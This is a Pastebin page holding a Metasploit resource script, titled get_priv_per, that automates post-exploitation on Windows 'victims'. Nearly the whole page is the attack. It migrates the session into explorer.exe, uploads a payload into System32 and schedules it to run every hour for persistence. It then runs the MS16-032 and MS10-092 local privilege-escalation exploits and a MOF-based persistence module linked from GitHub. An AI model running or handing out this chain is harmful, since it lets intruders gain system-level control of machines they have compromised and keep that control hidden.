Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #
- # get_priv_per Script Coded By !NDi G3@r
- # This RC Script will automate the process of privilege escalation and persistence in WINDOWS victims
- #
- #
- #
- # Kindly Change Settings According To Your Post Exploitation Vector
- # Change payload.exe to any respective name u gave to your payload
- # Install MOF_PS_PERSIST from the link given below
- # raw. githubusercontent .com/khr0x40sh/metasploit-modules/master/persistence/mof_ps_persist.rb
- # Set your options with global variable (setg)
- # SSA- Suspicious Shell Activity
- # usage:
- # Meterpreter > resource /../path/get_priv_per.rc
- sysinfo
- getprivs
- getsystem
- getuid
- run migrate -n explorer.exe
- upload payload.exe C:\\Windows\\System32
- run scheduleme -hr 1 -c "C:\\Windows\\System32\\payload.exe"
- background
- # MS16-032 Privilege Escalation Exploit (make sure victim box is installed with powrshell)
- use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
- setg SESSION [session_id]
- show options
- exploit
- # Windows Escalate Task Scheduler XML Privilege Escalation
- use windows/local/ms10_092_schelevator
- show options
- exploit
- #MOF_PS_PERSIST
- use post/windows/mof_ps_persist
- show options
- exploit
Add Comment
Please, Sign In to add comment